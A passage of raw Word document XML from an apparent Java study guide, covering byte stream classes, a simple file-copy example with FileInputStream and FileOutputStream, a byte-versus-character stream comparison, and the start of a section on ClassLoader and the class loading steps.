            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="258C92DC" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AC25C34"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ufferedOutputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D580A36"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rites data efficiently using a buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="502C0343" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CEAC236"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yteArrayOutputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7529659C"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rites to a byte array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="0D7F7D70" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43860944"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bjectOutputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="081E4D13"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rites Java objects to a stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EFBF99E" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007F1325">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4D51868">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A40A9F" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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Simple Example: Reading a file using Byte Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D08D26" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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o</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FileInputStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3C312" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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o</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FileOutputStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F6255" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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o</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IOException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C13B9" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D6690" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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ByteStreamExamp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33491A9" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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2C4B0B9" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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y</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EBC891E" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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ileInputStream</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ileInputStream</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input.txt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E50A8F" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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ileOutputStream</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ou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ileOutputStream</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output.txt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2CE71" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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4468B43" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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byteData</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41594462" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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whi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byteDat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a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8A1428A" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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writ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yteData</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8260ED" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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DCD582A" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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File copied successfully using byte stream."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC04AC" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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atch</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IOException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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D0C03EA" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            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StackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF0226" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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20232FD" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B9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3A60DA6" w14:textId="16AC41A7" w:rsidR="007F1325" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E1F8D" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007F1325">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E162E10">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D37C4" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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When to Use Byte Stream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66039176" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>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working with non-textual data (images, videos, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E19B190" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>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need to process data byte by byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957609F" w14:textId="6DE53B1D" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>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dealing with platform-independent binary formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5822928B" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007F1325">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F2054F">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="415CD615" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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Byte Stream vs Character Strea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87"/>
        <w:gridCol w:w="3921"/>
        <w:gridCol w:w="3198"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="585F6466" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218DB993" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="00420045">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5514FCFD" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="00420045">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Byte Stream (InputStream/OutputStream)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="213A65C8" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="00420045">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haracter Stream (Reader/Writer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="0CD9A040" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9B867A"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ata Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F82E5F7"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8-bit bytes (binary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BBD00EF"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16-bit characters (text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="329E1933" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13E57F69"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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66558F8C"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ages, videos, PDFs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B70D4BC"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ext files, character data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="5B9D832E" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76397864"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ase Classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15CC7D61"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putStream, OutputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60F2BF30" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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ader, Writer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D4735B" w14:textId="38FCB4A1" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007F1325">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="08A4E548">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FA8732" w14:textId="1D464129" w:rsidR="00D16FEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00D16FEC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc196307486"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Classloader? Different types of it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="72A1485A" w14:textId="421D59D6" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Runtime Environment (JRE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> responsible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loading .class files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into memory </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3061A593" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java doesn't load all classes at once — it loads them </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on demand</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and the ClassLoader is what performs that task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19BC10" w14:textId="1770131F" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F508C7A" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Class Loading Process (High-Level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6029F5EA" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Load</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The class file is located and loaded into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC0ACB" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – It verifies, prepares, and optionally resolves the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6E017" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initialize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Static blocks and static variables are initialized.</w:t>
      </w:r>
    </w:p>
